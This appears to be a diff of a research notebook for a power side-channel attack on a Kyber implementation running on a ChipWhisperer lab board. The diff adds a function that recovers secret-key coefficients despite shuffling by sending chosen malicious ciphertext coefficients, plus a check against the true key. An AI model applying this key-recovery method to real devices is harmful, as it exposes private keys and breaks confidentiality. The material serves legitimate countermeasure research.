--- a/Attack_with_CW/kyber_polytomsg_leakage_detection_shuffling.ipynb
+++ b/Attack_with_CW/kyber_polytomsg_leakage_detection_shuffling.ipynb
@@ -27,23 +27,23 @@
   {
    "cell_type": "code",
    "execution_count": null,
+   "id": "c8c1a50e-2a40-41be-b518-182bd18649d6",
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# Loading auxiliary functions\n",
+    "%run -i ../Common_functions/Additional_functions.py"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
    "id": "480b1c45",
    "metadata": {},
    "outputs": [],
    "source": [
     "# Loading auxiliary functions for Chipwhisperer communication\n",
     "%run -i Chipwhisperer_functions.py"
-   ]
-  },
-  {
-   "cell_type": "code",
-   "execution_count": null,
-   "id": "6e6e8602",
-   "metadata": {},
-   "outputs": [],
-   "source": [
-    "# Loading auxiliary functions\n",
-    "%run -i ../Common_functions/Additional_functions.py"
    ]
   },
   {
@@ -113,8 +113,8 @@
     "PLATFORM = 'CWLITEARM'\n",
     "\n",
     "# Project Targeted\n",
-    "# CRYPTO_TARGET ='FMLKEM'\n",
-    "CRYPTO_TARGET ='FKYBER'\n",
+    "CRYPTO_TARGET ='KYBER'\n",
+    "# CRYPTO_TARGET ='FFKYBER'\n",
     "\n",
     "# SimpleSerial version used\n",
     "SS_VER = 'SS_VER_1_1'\n",
@@ -211,7 +211,7 @@
   {
    "cell_type": "code",
    "execution_count": null,
-   "id": "0a6309ed",
+   "id": "7cae1479-21a8-4a9f-b631-2e74623259e0",
    "metadata": {
     "scrolled": true
    },
@@ -222,7 +222,7 @@
     "\n",
     "printf \"CLEANING PREVIOUS BUILD FILES:\\n\\n\"\n",
     "make -s clean PLATFORM=$2 CRYPTO_TARGET=$3 SS_VER=$4 \n",
-    "rm -f ../crypto/fkyber/extra/*.o\n",
+    "rm -f ../extra/*.o\n",
     "\n",
     "printf \"\\nBUILDING PROJECT FILES:\\n\\n\"\n",
     "make PLATFORM=$2 CRYPTO_TARGET=$3 SS_VER=$4 K=$5 SHUFFLED=$6"
@@ -1174,7 +1174,8 @@
    "metadata": {},
    "outputs": [],
    "source": [
-    "reduced_start = 6\n",
+    "# reduced_start = 6\n",
+    "reduced_start = 9\n",
     "reduced_len   = 2\n",
     "reduced_end   = reduced_start + reduced_len\n",
     "\n",
@@ -1221,7 +1222,7 @@
    "outputs": [],
    "source": [
     "# We redefine the function that computes the window on the restricted samples\n",
-    "def get_compress_index_window(compress_index):\n",
+    "def get_compress_index_window_reduced(compress_index):\n",
     "    start_compress_index =  start_index_compress_coeff0\\\n",
     "                          + compress_index*approximate_length_compress_coeff\\\n",
     "                          + (compress_index//nb_coeffs)*(nb_coeffs-1)*distance_forj_loop_forj_loop\\\n",
@@ -1309,7 +1310,7 @@
     "    _, trace = kyber_decrypt(polyvec_u, poly_v, read = False, capture = True)\n",
     "\n",
     "    for coeff_index in range(N):\n",
-    "        start_compress_coeff, end_compress_coeff = get_compress_index_window(coeff_index)\n",
+    "        start_compress_coeff, end_compress_coeff = get_compress_index_window_reduced(coeff_index)\n",
     "        # Each trace is used to distinguish between coeffs rounded to 0 and coeffs rounded to 1\n",
     "        trace_compress_coeff = trace[start_compress_coeff:end_compress_coeff + 1]\n",
     "\n",
@@ -1398,6 +1399,78 @@
   {
    "cell_type": "code",
    "execution_count": null,
+   "id": "52d23f05-0a32-4a20-9351-da6a594c5ceb",
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "def find_one_coeff_shufle(poly_targ_, coeff_targ_):\n",
+    "    \"\"\"\n",
+    "    Main part of the attack, recovers one coefficient even with shuffling\n",
+    "    \"\"\"\n",
+    "    s_guess = 0\n",
+    "\n",
+    "    ref_malicious_u_coeff = 107 # 107 = decompress(33, d = DU)\n",
+    "    ref_malicious_v_coeff = -832\n",
+    "    ref_count0, ref_count1 = count_coeffs(poly_targ_, coeff_targ_, (ref_malicious_v_coeff)%Q, (ref_malicious_v_coeff)%Q, ref_malicious_u_coeff)\n",
+    "\n",
+    "    # Zero Test\n",
+    "    malicious_u_coeff = 208 # 208 = decompress(64, d = DU)\n",
+    "    malicious_v_coeff = -1040\n",
+    "    count0, count1 = count_coeffs(poly_targ_, coeff_targ_, (ref_malicious_v_coeff)%Q, (malicious_v_coeff)%Q, malicious_u_coeff)\n",
+    "\n",
+    "    if (count0 != ref_count0) and (count1 != ref_count1):\n",
+    "        return s_guess\n",
+    "        \n",
+    "    else: # Positive/Negative Test\n",
+    "        malicious_v_coeff = -416\n",
+    "        count0, count1 = count_coeffs(poly_targ_, coeff_targ_, (ref_malicious_v_coeff)%Q, (malicious_v_coeff)%Q, ref_malicious_u_coeff)\n",
+    "        \n",
+    "        if (count0 != ref_count0) and (count1 != ref_count1): # Coeff is positive\n",
+    "            malicious_v_coeff = -624\n",
+    "            count0, count1 = count_coeffs(poly_targ_, coeff_targ_, (ref_malicious_v_coeff)%Q, (malicious_v_coeff)%Q, ref_malicious_u_coeff)\n",
+    "            if (count0 != ref_count0) and (count1 != ref_count1):\n",
+    "                s_guess = 1\n",
+    "                return s_guess\n",
+    "                \n",
+    "            if K != 2:\n",
+    "                s_guess = 2\n",
+    "                return s_guess\n",
+    "                \n",
+    "            malicious_u_coeff = 72  # 72 = decompress(22, d = DU)\n",
+    "            malicious_v_coeff = -624\n",
+    "            count0, count1 = count_coeffs(poly_targ_, coeff_targ_, (ref_malicious_v_coeff)%Q, (malicious_v_coeff)%Q, malicious_u_coeff)\n",
+    "            if (count0 != ref_count0) and (count1 != ref_count1):\n",
+    "                s_guess = 2\n",
+    "                return s_guess\n",
+    "                \n",
+    "            s_guess = 3\n",
+    "            return s_guess\n",
+    "            \n",
+    "        else: # Coeff is negative\n",
+    "            malicious_v_coeff = -1040\n",
+    "            count0, count1 = count_coeffs(poly_targ_, coeff_targ_, (ref_malicious_v_coeff)%Q, (malicious_v_coeff)%Q, ref_malicious_u_coeff)\n",
+    "            if (count0 != ref_count0) and (count1 != ref_count1):\n",
+    "                s_guess = -1\n",
+    "                return s_guess\n",
+    "                \n",
+    "            if K != 2:\n",
+    "                s_guess = -2\n",
+    "                return s_guess\n",
+    "                \n",
+    "            malicious_u_coeff = 72  # 72 = decompress(22, d = DU)\n",
+    "            malicious_v_coeff = -1040\n",
+    "            count0, count1 = count_coeffs(poly_targ_, coeff_targ_, (ref_malicious_v_coeff)%Q, (malicious_v_coeff)%Q, malicious_u_coeff)\n",
+    "            if (count0 != ref_count0) and (count1 != ref_count1):\n",
+    "                s_guess = -2\n",
+    "                return s_guess\n",
+    "\n",
+    "            s_guess = -3\n",
+    "            return s_guess"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
    "id": "c03f3d14-bbe6-416a-a98b-c620db85148a",
    "metadata": {},
    "outputs": [],
@@ -1416,7 +1489,7 @@
     "%%time\n",
     "\n",
     "for poly_targeted in trange(0, 1, desc = \"Recovering polynomials\"):\n",
-    "    for coeff_targeted in trange(N, desc = \"Recovering coefficients\"):\n",
+    "    for coeff_targeted in trange(10, desc = \"Recovering coefficients\"):\n",
     "        found_polyvec_sk_PKE[poly_targeted][coeff_targeted] = find_one_coeff_shufle(poly_targeted, coeff_targeted)\n"
    ]
   },
@@ -1470,6 +1543,18 @@
    "outputs": [],
    "source": [
     "print(polyvec_sk_PKE[0])"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "id": "26d9c144-fa4d-4486-b7c3-70dfd92636c7",
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "for i in range(256):\n",
+    "    if polyvec_sk_PKE[0][i] != found_polyvec_sk_PKE[0][i]:\n",
+    "        print(i)"
    ]
   },
   {
